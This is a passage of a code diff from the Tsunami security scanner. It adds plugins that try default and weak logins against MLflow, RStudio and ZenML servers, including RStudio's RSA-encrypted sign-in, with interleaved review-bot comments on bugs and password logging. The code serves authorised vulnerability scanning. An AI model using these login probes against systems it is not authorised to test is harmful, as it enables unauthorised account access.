"$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/credentials/generic_weak_credential_detector/gradlew.bat b/google/detectors/credentials/generic_weak_credential_detector/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/credentials/generic_weak_credential_detector/gradlew.bat +++ b/google/detectors/credentials/generic_weak_credential_detector/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/GenericWeakCredentialDetectorBootstrapModule.java b/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/GenericWeakCredentialDetectorBootstrapModule.java index 9845a3692..db865a24a 100644 --- a/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/GenericWeakCredentialDetectorBootstrapModule.java +++ b/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/GenericWeakCredentialDetectorBootstrapModule.java 
@@ -39,11 +39,15 @@ import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.grafana.GrafanaCredentialTester; import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.hydra.HydraCredentialTester; import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.jenkins.JenkinsCredentialTester; +import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.mlflow.MlFlowCredentialTester; import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.mysql.MysqlCredentialTester; import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.ncrack.NcrackCredentialTester; import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.postgres.PostgresCredentialTester; import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.rabbitmq.RabbitMQCredentialTester; import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.wordpress.WordpressCredentialTester; +import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.rstudio.RStudioCredentialTester; +import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.zenml.ZenMlCredentialTester; + import java.io.FileNotFoundException; import java.io.IOException; import java.nio.file.Files; 
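Review bot: The `RStudioCredentialTester` import is appended after the `wordpress` import instead of in sorted position, and a blank line is added before `import java.io.FileNotFoundException;` where the old side had none. The `mlflow` import in the same hunk is placed in order, and the surrounding block is otherwise ASCII-sorted. Move the `...testers.rstudio.RStudioCredentialTester` import to directly after the `rabbitmq` one, leave `zenml` after `wordpress`, and drop the added empty line; a formatter pass over the file should produce the same result.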
@@ -64,13 +68,16 @@ protected void configurePlugin() { Multibinder credentialTesterBinder = Multibinder.newSetBinder(binder(), CredentialTester.class); credentialTesterBinder.addBinding().to(JenkinsCredentialTester.class); + credentialTesterBinder.addBinding().to(MlFlowCredentialTester.class); credentialTesterBinder.addBinding().to(MysqlCredentialTester.class); credentialTesterBinder.addBinding().to(HydraCredentialTester.class); credentialTesterBinder.addBinding().to(NcrackCredentialTester.class); credentialTesterBinder.addBinding().to(PostgresCredentialTester.class); credentialTesterBinder.addBinding().to(WordpressCredentialTester.class); credentialTesterBinder.addBinding().to(GrafanaCredentialTester.class); + credentialTesterBinder.addBinding().to(RStudioCredentialTester.class); credentialTesterBinder.addBinding().to(RabbitMQCredentialTester.class); + credentialTesterBinder.addBinding().to(ZenMlCredentialTester.class); Multibinder credentialProviderBinder = Multibinder.newSetBinder(binder(), CredentialProvider.class); diff --git a/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/provider/Top100Passwords.java b/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/provider/Top100Passwords.java index 581f860e2..3a2d2afa5 100644 --- a/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/provider/Top100Passwords.java +++ b/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/provider/Top100Passwords.java 
@@ -57,7 +57,8 @@ public final class Top100Passwords extends CredentialProvider { "ec2-user", "vagrant", "azureuser", - "cisco"); + "cisco", + "rstudio"); private static final ImmutableList TOP_100_PASSWORDS = ImmutableList.of( diff --git a/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/mlflow/MlFlowCredentialTester.java b/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/mlflow/MlFlowCredentialTester.java new file mode 100644 index 000000000..9b0cc5cf2 --- /dev/null +++ b/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/mlflow/MlFlowCredentialTester.java 
@@ -0,0 +1,154 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.mlflow; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.tsunami.common.net.http.HttpRequest.get; +import static com.google.tsunami.common.net.http.HttpRequest.post; +import static java.nio.charset.StandardCharsets.UTF_8; + +import com.google.common.base.Strings; +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.gson.JsonObject; +import com.google.gson.JsonParser; +import com.google.gson.JsonSyntaxException; +import com.google.tsunami.common.data.NetworkEndpointUtils; +import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpHeaders; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.provider.TestCredential; +import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.tester.CredentialTester; +import com.google.tsunami.proto.NetworkService; +import java.io.IOException; +import java.util.Base64; +import java.util.List; +import javax.inject.Inject; + +/** Credential tester specifically for mlflow. 
*/ +public final class MlFlowCredentialTester extends CredentialTester { + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + private static final String MLFLOW_SERVICE = "mlflow"; + + private final HttpClient httpClient; + + @Inject + MlFlowCredentialTester(HttpClient httpClient) { + this.httpClient = checkNotNull(httpClient); + } + + @Override + public String name() { + return "MlFlowCredentialTester"; + } + + @Override + public String description() { + return "MlFlow credential tester."; + } + + @Override + public boolean canAccept(NetworkService networkService) { + return NetworkServiceUtils.getWebServiceName(networkService).equals(MLFLOW_SERVICE); + } + + @Override + public boolean batched() { + return true; + } + + @Override + public ImmutableList testValidCredentials( + NetworkService networkService, List credentials) { + // Always return 1st weak credential to gracefully handle no auth configured case, where we + // return empty credential instead of all the weak credentials + return credentials.stream() + .filter(cred -> isMlFlowAccessible(networkService, cred)) + .findFirst() + .map(ImmutableList::of) + .orElseGet(ImmutableList::of); + } + + private boolean isMlFlowAccessible(NetworkService networkService, TestCredential credential) { + var uriAuthority = NetworkEndpointUtils.toUriAuthority(networkService.getNetworkEndpoint()); + var url = + String.format( + "http://%s/%s?username=%s", + uriAuthority, "api/2.0/mlflow/users/get", credential.username()); + try { + logger.atInfo().log( + "url: %s, username: %s, password: %s", + url, credential.username(), credential.password().orElse("")); + HttpResponse response = sendRequestWithCredentials(url, credential); + return response.status().isSuccess() + && response + .bodyString() + .map(MlFlowCredentialTester::bodyContainsSuccessfulUserInfo) + .orElse(false); + } catch (IOException e) { + logger.atWarning().withCause(e).log("Unable to query '%s'.", url); + return false; + } + } + + 
private HttpResponse sendRequestWithCredentials(String url, TestCredential credential) + throws IOException { + // For testing no-auth configured case, no auth header is passed in + if (Strings.isNullOrEmpty(credential.username()) + && Strings.isNullOrEmpty(credential.password().orElse(""))) { + return httpClient.send(post(url).withEmptyHeaders().build()); + } + + return httpClient.send( + get(url) + .setHeaders( + HttpHeaders.builder() + .addHeader( + "Authorization", + "basic " + + Base64.getEncoder() + .encodeToString( + (credential.username() + ":" + credential.password().orElse("")) + .getBytes(UTF_8))) + .build()) + .build()); + } + + /** + * A successful authenticated request to the /api/2.0/mlflow/users/get?username=admin endpoint + * returns a JSON with a root key like the following: + * {"user":{"experiment_permissions":[],"id":1,"is_admin":true,"registered_model_permissions":[], + * "username":"admin"}} + */ + private static boolean bodyContainsSuccessfulUserInfo(String responseBody) { + try { + JsonObject response = JsonParser.parseString(responseBody).getAsJsonObject(); + + if (response.has("user")) { + logger.atInfo().log("Successfully received a mlflow user info"); + return true; + } else { + return false; + } + } catch (JsonSyntaxException e) { + logger.atWarning().withCause(e).log( + "An error occurred while parsing the json response: %s", responseBody); + return false; + } + } +} diff --git a/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/rstudio/RStudioCredentialTester.java b/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/rstudio/RStudioCredentialTester.java new file mode 100644 index 000000000..67663e69b --- /dev/null 
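Review bot: In `sendRequestWithCredentials` the empty-credential branch sends `post(url)` while the authenticated branch sends `get(url)` to the same `api/2.0/mlflow/users/get` path, so the no-auth probe may never match. The test dispatcher added in this commit only answers GET on that path and no test exercises the empty-credential case, which suggests the POST is unintended; `return httpClient.send(get(url).withEmptyHeaders().build());` would keep both probes on the same method. Separately, the `logger.atInfo()` call in `isMlFlowAccessible` writes every candidate password into the scan log, and the same line appears in `isRStudioAccessible`. Logging only the target and account, `logger.atInfo().log("url: %s, username: %s", url, credential.username());`, keeps credentials that turn out to be valid out of log storage.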
+++ b/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/rstudio/RStudioCredentialTester.java 
@@ -0,0 +1,254 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.rstudio; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.common.collect.ImmutableList.toImmutableList; +import static com.google.tsunami.common.net.http.HttpRequest.get; +import static com.google.tsunami.common.net.http.HttpRequest.post; + +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.protobuf.ByteString; +import com.google.tsunami.common.data.NetworkEndpointUtils; +import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpHeaders; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.provider.TestCredential; +import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.tester.CredentialTester; +import com.google.tsunami.proto.NetworkService; +import java.io.IOException; +import java.math.BigInteger; +import java.security.InvalidKeyException; +import java.security.KeyFactory; +import java.security.NoSuchAlgorithmException; +import java.security.NoSuchProviderException; +import java.security.interfaces.RSAPublicKey; +import 
java.security.spec.InvalidKeySpecException; +import java.security.spec.RSAPublicKeySpec; +import java.util.List; +import java.util.Base64; +import java.util.Optional; +import javax.crypto.BadPaddingException; +import javax.crypto.Cipher; +import javax.crypto.IllegalBlockSizeException; +import javax.crypto.NoSuchPaddingException; +import javax.inject.Inject; +import org.jsoup.Jsoup; +import org.jsoup.nodes.Document; + +/** Credential tester for RStudio. */ +public final class RStudioCredentialTester extends CredentialTester { + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + private final HttpClient httpClient; + + private static final String RSTUDIO_SERVICE = "rstudio"; + private static final String RSTUDIO_HEADER = "RStudio"; + private static final String SERVER_HEADER = "Server"; + private static final String RSTUDIO_UNSUPPORTED_BROWSER_TITLE = "RStudio: Browser Not Supported"; + private static final String RSTUDIO_UNSUPPORTED_BROWSER_P = + "Your web browser is not supported by RStudio."; + + @Inject + RStudioCredentialTester(HttpClient httpClient) { + this.httpClient = checkNotNull(httpClient).modify().setFollowRedirects(false).build(); + } + + @Override + public String name() { + return "RStudioCredentialTester"; + } + + @Override + public boolean batched() { + return false; + } + + @Override + public String description() { + return "RStudio credential tester."; + } + + private static String buildTargetUrl(NetworkService networkService, String path) { + StringBuilder targetUrlBuilder = new StringBuilder(); + + if (NetworkServiceUtils.isWebService(networkService)) { + targetUrlBuilder.append(NetworkServiceUtils.buildWebApplicationRootUrl(networkService)); + } else { + // Default to HTTP protocol when the scanner cannot identify the actual service. 
+ targetUrlBuilder + .append("http://") + .append(NetworkEndpointUtils.toUriAuthority(networkService.getNetworkEndpoint())) + .append("/"); + } + targetUrlBuilder.append(path); + return targetUrlBuilder.toString(); + } + + /** + * Determines if this tester can accept the {@link NetworkService} based on the name of the + * service or a custom fingerprint. The fingerprint is necessary since nmap doesn't recognize a + * rstudio server instance correctly. + * + * @param networkService the network service passed by tsunami + * @return true if a rstudio server instance is recognized + */ + @Override + public boolean canAccept(NetworkService networkService) { + boolean canAcceptByNmapReport = + NetworkServiceUtils.getWebServiceName(networkService).equals(RSTUDIO_SERVICE); + if (canAcceptByNmapReport) { + return true; + } + boolean canAcceptByCustomFingerprint = false; + String url = buildTargetUrl(networkService, "unsupported_browser.htm"); + try { + logger.atInfo().log("Probing RStudio - custom fingerprint phase"); + HttpResponse response = httpClient.send(get(url).withEmptyHeaders().build()); + canAcceptByCustomFingerprint = + response.status().isSuccess() + && response.headers().get(SERVER_HEADER).isPresent() + && response.headers().get(SERVER_HEADER).get().equals(RSTUDIO_HEADER) + && response + .bodyString() + .map(RStudioCredentialTester::bodyContainsRStudioElements) + .orElse(false); + } catch (IOException e) { + logger.atWarning().withCause(e).log("Unable to query '%s'.", url); + return false; + } + return canAcceptByCustomFingerprint; + } + + private static boolean bodyContainsRStudioElements(String responseBody) { + Document doc = Jsoup.parse(responseBody); + String title = doc.title(); + String p = + doc.body().getElementsByTag("p").first().outerHtml().split("

")[1].split("

")[0]; + + if (title.contains(RSTUDIO_UNSUPPORTED_BROWSER_TITLE) + && p.contains(RSTUDIO_UNSUPPORTED_BROWSER_P)) { + logger.atInfo().log("Found RStudio endpoint"); + return true; + } else { + return false; + } + } + + @Override + public ImmutableList testValidCredentials( + NetworkService networkService, List credentials) { + + return credentials.stream() + .filter(cred -> isRStudioAccessible(networkService, cred)) + .findFirst() + .map(ImmutableList::of) + .orElseGet(ImmutableList::of); + } + + private boolean isRStudioAccessible(NetworkService networkService, TestCredential credential) { + var url = buildTargetUrl(networkService, "auth-public-key"); + try { + logger.atInfo().log("Retrieving public key"); + HttpResponse response = httpClient.send(get(url).withEmptyHeaders().build()); + Optional body = response.bodyString(); + String exponent = body.get().split(":")[0]; + String modulus = body.get().split(":")[1]; + + url = buildTargetUrl(networkService, "auth-do-sign-in"); + logger.atInfo().log( + "url: %s, username: %s, password: %s", + url, credential.username(), credential.password().orElse("")); + response = sendRequestWithCredentials(url, credential, exponent, modulus); + + if (response.headers().get("Set-Cookie").isPresent()) { + for (String s : response.headers().getAll("Set-Cookie")) { + if (s.contains("user-id=" + credential.username())) { + logger.atInfo().log("Found valid credentials"); + return true; + } + } + } else { + return false; + } + } catch (IOException + | NoSuchProviderException + | NoSuchAlgorithmException + | BadPaddingException + | IllegalBlockSizeException + | InvalidKeyException + | NoSuchPaddingException + | InvalidKeySpecException e) { + logger.atWarning().withCause(e).log("Unable to query '%s'.", url); + } + return false; + } + + // This function base64 encodes provided cipertext string in hex. 
+ private String hexToBase64(String hex) { + return Base64.getEncoder().encodeToString(new BigInteger(hex, 16).toByteArray()); + } + + private HttpResponse sendRequestWithCredentials( + String url, TestCredential credential, String exponent, String modulus) + throws NoSuchAlgorithmException, + BadPaddingException, + IllegalBlockSizeException, + InvalidKeyException, + NoSuchPaddingException, + InvalidKeySpecException, + IOException, + NoSuchProviderException { + // Encrypting with RSA PCKS#1 version 2. + RSAPublicKeySpec spec = + new RSAPublicKeySpec(new BigInteger(modulus, 16), new BigInteger(exponent, 16)); + KeyFactory factory = KeyFactory.getInstance("RSA"); + RSAPublicKey key = (RSAPublicKey) factory.generatePublic(spec); + + Cipher cipher = Cipher.getInstance("RSA/ECB/PKCS1Padding"); + cipher.init(Cipher.ENCRYPT_MODE, key); + + StringBuilder sb = new StringBuilder(); + sb.append(credential.username()); + sb.append("\n"); + sb.append(credential.password().get()); + byte[] cipherData = cipher.doFinal(sb.toString().getBytes()); + + // Converting the ciphertext to hex. + sb = new StringBuilder(); + for (byte b : cipherData) { + sb.append(String.format("%02X", b)); + } + + String ciphertext = this.hexToBase64(sb.toString().toLowerCase()); + var headers = + HttpHeaders.builder() + .addHeader("Cookie", "rs-csrf-token=1") + .addHeader("Content-Type", "application/x-www-form-urlencoded") + .build(); + + sb = new StringBuilder(); + sb.append("rs-csrf-token=1&"); + sb.append("v=" + ciphertext.replaceAll("\\+", "%2b").replaceAll("=", "%3d")); + return httpClient.send( + post(url) + .setHeaders(headers) + .setRequestBody(ByteString.copyFrom(sb.toString().getBytes())) + .build()); + } +} 
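Review bot: `isRStudioAccessible` parses the target's `auth-public-key` response without validating it. `body.get()`, `split(":")[1]` and the later `new BigInteger(modulus, 16)` throw unchecked exceptions (NoSuchElementException, ArrayIndexOutOfBoundsException, NumberFormatException) that the catch list does not cover, so a malformed response from the scanned host would propagate out of `testValidCredentials` instead of counting as "not accessible". `sendRequestWithCredentials` has the same problem with `credential.password().get()` when a credential carries no password, although the log line in the caller already uses `orElse("")`. A guard such as `String[] parts = response.bodyString().orElse("").split(":"); if (parts.length != 2) return false;`, together with catching `NumberFormatException` and using `credential.password().orElse("")`, would make the probe fail closed. `bodyContainsRStudioElements` has a similar gap: `getElementsByTag("p").first()` can be null and the split result is indexed without a length check.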
diff --git a/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/zenml/ZenMlCredentialTester.java b/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/zenml/ZenMlCredentialTester.java new file mode 100644 index 000000000..39f071d77 --- /dev/null +++ b/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/zenml/ZenMlCredentialTester.java 
@@ -0,0 +1,153 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.zenml; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.tsunami.common.net.http.HttpRequest.post; + +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.gson.JsonObject; +import com.google.gson.JsonParser; +import com.google.gson.JsonSyntaxException; +import com.google.protobuf.ByteString; +import com.google.tsunami.common.data.NetworkEndpointUtils; +import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpHeaders; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.common.net.http.HttpStatus; +import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.provider.TestCredential; +import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.tester.CredentialTester; +import com.google.tsunami.proto.NetworkService; +import java.io.IOException; +import java.util.List; +import javax.inject.Inject; + +/** Credential tester specifically for zenml. 
*/ +public final class ZenMlCredentialTester extends CredentialTester { + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + private static final String ZENML_SERVICE = "zenml"; + + private final HttpClient httpClient; + + @Inject + ZenMlCredentialTester(HttpClient httpClient) { + this.httpClient = checkNotNull(httpClient); + } + + @Override + public String name() { + return "ZenMlCredentialTester"; + } + + @Override + public String description() { + return "ZenMl credential tester."; + } + + @Override + public boolean canAccept(NetworkService networkService) { + return NetworkServiceUtils.getWebServiceName(networkService).equals(ZENML_SERVICE); + } + + @Override + public boolean batched() { + return true; + } + + @Override + public ImmutableList testValidCredentials( + NetworkService networkService, List credentials) { + // Always return 1st weak credential to gracefully handle no auth configured case, where we + // return empty credential instead of all the weak credentials + return credentials.stream() + .filter(cred -> isZenMlAccessible(networkService, cred)) + .findFirst() + .map(ImmutableList::of) + .orElseGet(ImmutableList::of); + } + + private boolean isZenMlAccessible(NetworkService networkService, TestCredential credential) { + var uriAuthority = NetworkEndpointUtils.toUriAuthority(networkService.getNetworkEndpoint()); + var loginApiUrl = String.format("http://%s/%s", uriAuthority, "api/v1/login"); + try { + HttpResponse apiLoginResponse = + httpClient.send( + post(loginApiUrl) + .setHeaders( + HttpHeaders.builder() + .addHeader("Content-Type", "application/x-www-form-urlencoded") + .build()) + .setRequestBody( + ByteString.copyFromUtf8( + String.format( + "username=%s&password=%s", + credential.username(), credential.password().orElse("")))) + .build()); + + if (apiLoginResponse.status() == HttpStatus.UNAUTHORIZED + && apiLoginResponse.bodyString().isPresent() + && apiLoginResponse + .bodyString() + .get() + .equals( + 
"{\"detail\":[\"AuthorizationException\"," + + "\"Authentication error: invalid username or password\"]}")) { + return false; + } + + if (apiLoginResponse.status() == HttpStatus.OK + && apiLoginResponse.bodyString().isPresent() + && bodyContainsSuccessfulAccessToken(apiLoginResponse.bodyString().get())) { + logger.atWarning().log("=============================================="); + return true; + } + + } catch (IOException e) { + logger.atWarning().withCause(e).log("Unable to query '%s'.", loginApiUrl); + return false; + } + return false; + } + + /** + * A successful authenticated request to the /api/v1/login endpoint returns a JSON with a root key + * like the following: {"access_token":"An Access + * Token","token_type":"bearer","expires_in":null,"refresh_token":null,"scope":null} + */ + private static boolean bodyContainsSuccessfulAccessToken(String responseBody) { + try { + JsonObject response = JsonParser.parseString(responseBody).getAsJsonObject(); + + if (response.has("access_token") + && response.has("token_type") + && response.has("refresh_token") + && response.has("scope") + && response.has("expires_in")) { + logger.atInfo().log("Successfully logged in as a zenml user"); + return true; + } else { + return false; + } + } catch (JsonSyntaxException e) { + logger.atWarning().withCause(e).log( + "An error occurred while parsing the json response: %s", responseBody); + return false; + } + } +} diff --git a/google/detectors/credentials/generic_weak_credential_detector/src/main/resources/detectors/credentials/genericweakcredentialdetector/data/service_default_credentials.textproto b/google/detectors/credentials/generic_weak_credential_detector/src/main/resources/detectors/credentials/genericweakcredentialdetector/data/service_default_credentials.textproto index 35d38fddf..653b4e5ae 100644 
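Review bot: The login body in `isZenMlAccessible` is built with `String.format("username=%s&password=%s", ...)` and sent as `application/x-www-form-urlencoded` without encoding either value, so a candidate containing `&`, `=`, `+` or `%` reaches the server as a different string and a weak credential can be missed. Encoding both fields, e.g. `URLEncoder.encode(credential.password().orElse(""), UTF_8)` (which needs `java.net.URLEncoder` and `StandardCharsets.UTF_8` imported), avoids that. The success branch logs `logger.atWarning().log("==============================================")`, which looks like leftover debugging and should be removed. `JsonParser.parseString(responseBody).getAsJsonObject()` throws `IllegalStateException` for valid JSON that is not an object, which the `JsonSyntaxException` catch in `bodyContainsSuccessfulAccessToken` does not cover; `bodyContainsSuccessfulUserInfo` in MlFlowCredentialTester has the same pattern.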
